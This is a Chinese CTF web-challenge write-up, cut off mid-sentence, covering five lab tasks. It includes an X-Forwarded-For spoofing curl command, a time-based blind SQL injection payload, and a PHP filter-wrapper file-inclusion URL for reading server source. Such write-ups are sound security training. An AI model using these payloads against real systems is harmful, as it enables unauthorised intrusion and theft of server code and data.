任务一:CTF-Web(80分)
任务环境说明:
√ 服务器场景: System0116
√ 服务器场景操作系统:未知
√ 服务器场景用户名:未知 密码:未知
1.访问http://靶机IP/web1/,获取flag值,Flag格式为flag{xxx};(10分)
查看源码flag就在源码里面
在浏览器中打开目标网站,查看网页源代码,可以找到Flag。
2.访问http://靶机IP/web2/,获取flag值,Flag格式为flag{xxx};(10分)
使用bp看返回数据查看响应
在浏览器中打开目标网站,使用浏览器的开发者工具(如Chrome的开发者工具)打开“Network”标签页,输入用户名和密码后,查看响应,可以找到Flag。
3.访问http://靶机IP/web3/,获取flag值,Flag格式为flag{xxx};(20分)
伪造地址127.0.0.1
x-forwarded-for:127.0.0.1
在HTTP请求头中添加“X-Forwarded-For”字段,将其设置为“127.0.0.1”,模拟请求来自本地。例如,使用curl命令发送HTTP请求:
curl -H "X-Forwarded-For: 127.0.0.1" http://靶机IP/web3/
4.访问http://靶机IP/web4/,获取flag值,Flag格式为flag{xxx};(10分)
时间盲注 添加sleep函数 and sleep(5)
通过时间盲注攻击获取Flag,可以在输入框中输入以下内容,使用sleep函数并增加延迟时间,例如5秒:
' and if (sleep(5), 1, 1) and '
5.访问http://靶机IP/web5/,获取flag值,Flag格式为flag{xxx};(10分)
构造php伪协议
?file=php://filter/read=convert.base64-encode/resource=./fileprotocol.php
通过构造php伪协议,可以读取目标服务器上的PHP源代码,将其转换为base64编码,并在本地解码,获取Flag。例如,使用以下URL访问:
http://靶机IP/web5/?file=php://filter/read=convert.base64-encode/resource=./fileprotocol.php
其中,file参数指定要读取的文件路径,使用php://伪协议来指定读取PHP源代码,然后使用f